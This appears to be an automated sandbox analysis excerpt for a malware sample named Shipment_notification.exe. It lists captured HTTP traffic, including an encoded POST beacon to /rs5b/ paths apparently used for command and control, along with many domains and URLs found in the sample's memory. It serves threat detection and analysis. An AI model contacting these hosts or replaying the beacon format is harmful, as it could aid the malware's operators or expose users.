          Source: global trafficHTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.locationsbormes.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.locationsbormes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.locationsbormes.com/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 30 6c 4f 50 53 70 4b 5f 76 35 50 62 6b 37 28 30 67 52 4f 57 79 65 79 61 37 4f 67 44 79 65 59 63 57 6e 58 6f 56 43 35 53 76 72 76 68 4e 42 61 37 30 4c 4b 57 61 58 37 7a 32 63 78 32 31 69 42 77 59 52 35 53 4f 5f 72 70 36 58 71 50 68 4e 43 7a 69 6e 50 41 6f 56 45 61 52 41 49 77 59 2d 42 54 34 41 79 42 64 72 39 66 6a 6a 54 52 50 65 6d 78 55 48 7e 6f 4e 47 4b 37 5a 49 77 62 52 68 51 30 7e 79 61 61 42 5f 77 76 41 32 67 71 42 65 34 77 66 6a 70 74 7e 45 63 31 6d 34 59 58 4b 4c 74 50 39 38 79 55 50 75 57 4e 72 55 7a 52 45 53 56 33 74 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=0lOPSpK_v5Pbk7(0gROWyeya7OgDyeYcWnXoVC5SvrvhNBa70LKWaX7z2cx21iBwYR5SO_rp6XqPhNCzinPAoVEaRAIwY-BT4AyBdr9fjjTRPemxUH~oNGK7ZIwbRhQ0~yaaB_wvA2gqBe4wfjpt~Ec1m4YXKLtP98yUPuWNrUzRESV3tA).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 15:49:47 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 15:49:50 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://carcosainvest.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 20 Mar 2023 15:49:55 GMTserver: LiteSpeedData Raw: 31 32 30 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5b 5b 77 db b6 b2 7e b6 7f 05 4c af d8 62 0b 52 24 75 35 15 3a a7 3b 6d 9f da dd ae 5e 1e ce 4a 72 bc 20 12 94 90 90 04 37 00 5d 7c 54 ff f7 bd 00 90 e2 45 94 e5 ca a9 bd e2 88 c0 cc 37 83 c1 60 00 cc 50 17 6f af be ff e5 fd 1f ff fb eb 0f 60 29 d2 e4 fe f2 e2 ad fc 1f 24 28 5b 04 06 ce ac 3f 7f 37 54 23 46 d1 fd e5 c5 c5 db 14 0b 04 c2 25 62 1c 8b c0 f8 f3 8f 1f ad a9 01 fa 55 57 86 52 1c 18 6b 82 37 39 65 c2 00 21 cd 04 ce 44 60 6c 48 24 96 41 84 d7 24 c4 96 7a 80 80 64 44 10 94 58 3c 44 09 0e 5c 29 e9 e2 6d 42 b2 2f 80 e1 24 30 72 46 63 92 60 03 2c 19 8e 03 63 29 44 ce fd 7e 7f 91 e6 0b 9b b2 45 7f 1b 67 7d b7 e0 12 44 24 f8 fe 57 b4 c0 20 a3 02 c4 74 95 45 e0 e6 7a ea b9 ee 0c bc 47 2c a4 1c 91 6c 8d b9 78 db d7 b4 97 7a 2c 4a e1 5b 46 e7 54 f0 db bd ba b7 29 da 5a 24 45 0b 6c e5 0c cb e1 f8 09 62 0b 7c 2b c7 5a a9 78 1b 65 5c 12 c4 58 84 cb 5b ad e7 6d bf 1f d6 e5 d9 21 4d 5b 6c 06 4a 04 66 19 12 d8 00 e2 31 c7 81 81 f2 3c 21 21 12 84 66 7d c6 f9 b7 db 34 31 80 d2 33 30 1a da 83 1b 86 fe b3 a2 33 f0 23 c6 51 db 32 07 72 fb 31 c6 51 5f 4d 50 a5 f4 d7 90 fe 9e a6 29 ce 04 7f a1 1a 61 41 5e d7 87 87 8c e4 e2 fe 72 8d 18 c8 d1 02 27 e8 11 b3 07 f4 19 6d 57 2c 01 01 d8 cf f7 e1 a8 36 b9 85 a2 94 64 7d f5 d7 92 3c 76 be cc df 19 b3 16 da 22 a1 73 94 3c 64 34 0b b1 84 1c df c5 6e 3c 89 dc d0 3b 20 e5 98 ad 31 7b 10 24 95 94 ee 78 72 37 f0 26 83 bb 51 1b 92 f0 87 84 ac 15 da 01 46 8c 42 3c a7 f4 cb 03 89 a4 b4 83 7e 8e 85 20 d9 82 83 00 ec 8c 9c 72 f1 20 67 9f 1b fe 07 f5 64 40 43 1a c2 f8 04 0d 9c a1 79 82 1f 16 64 8d 99 e1 1b ae 01 8d 14 6d 1f d4 ba 31 7c d7 9d 38 d0 10 92 44 3c cc 19 46 5f 72 4a 32 61 f8 93 f1 14 1a 29 9d 93 04 37 da 07 63 07 1a 9c 44 78 8e 98 e1 c7 28 e1 18 1a 73 1a 3d 3e c4 54 f2 19 06 34 42 9a d0 b2 f3 a9 3d 6a 86 43 94 8b 70 f9 20 03 43 31 b6 b7 fd 62 0a df 72 f1 98 60 40 a2 c0 c8 69 be 4a 10 8b b7 96 36 bd a5 ba 78 e9 e6 02 6f 45 3f e4 dc b8 bf b4 39 11 d8 5a 62 14 61 06 76 73 14 7e 59 30 b9 68 2d a5 87 7f 1d ab 9f 2b 92 ca 38 82 32 31 7b 2a 58 d4 aa 00 08 ec 0a 42 77 22 7f 9f 23 04 72 90 16 27 ff 8f 7d 30 70 40 be 9d 81 12 2c c2 7a 0c 84 66 2d 40 d0 81 d8 a0 ae 81 ba a3 7c bb d7 2f a6 54 74 0f a9 d0 14 d4 c7 74 f9 b6 af 4c 74 5f 5b 9f 39 c3 09 45 07 ab 5b 0a e4 f6 82 d2 45 82 51 4e b8 0c 2c d2 98 ef 62 94 92 e4 31 f8 95 e6 39 c9 f8 9b c1 77 43 c7 79 33 79 ff b3 a4 c7 8c 21 a1 9b 0c 80 78 60 a8 50 65 80 90 51 ce 29 23 0b 92 05 06 ca 68 f6 98 d2 15 37 ea 6a d4 63 5b 3b d2 14 ba 70 81 04 09 a5 22 46 3d 2c 1a 39 c3 21 cd 32 1c 8a d3 8c c7 55 a9 b9 55 19 1f ac 0d dd 58 28 23 a9 0a 95 da bb 0e 9d cb
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 15:50:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 15:50:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: control.exe, 00000004.00000002.582622308.00000000056AC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://carcosainvest.com/rs5b/?uyxvg=nOUSwineJuxPGPhQvt4EE68jEsCX
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.53876.world
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.53876.world/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amirah.cfd
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amirah.cfd/rs5b/
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.339413260.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.577680371.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.carcosainvest.com
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.carcosainvest.com/rs5b/
          Source: Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comn
          Source: Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.como.
          Source: Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comx
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.drkathleensanders.com
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.drkathleensanders.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emagrecarapido.store
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emagrecarapido.store/rs5b/
          Source: Shipment_notification.exe, 00000000.00000002.336768528.0000000000C67000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Shipment_notification.exe, 00000000.00000003.320681722.0000000005578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlP
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.320065711.00000000055AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Shipment_notification.exe, 00000000.00000002.336768528.0000000000C67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comzana
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Shipment_notification.exe, 00000000.00000003.315344428.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.316084822.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315510968.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315947840.000000000557F000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315357516.000000000557D000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Shipment_notification.exe, 00000000.00000003.315947840.000000000557F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/b
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Shipment_notification.exe, 00000000.00000003.315344428.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315357516.000000000557D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cni9
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Shipment_notification.exe, 00000000.00000003.322681699.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322630345.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322651512.0000000005577000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322604070.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322780036.000000000557F000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.isabellagambitta.com
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.isabellagambitta.com/rs5b/
          Source: control.exe, 00000004.00000002.582622308.0000000005388000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
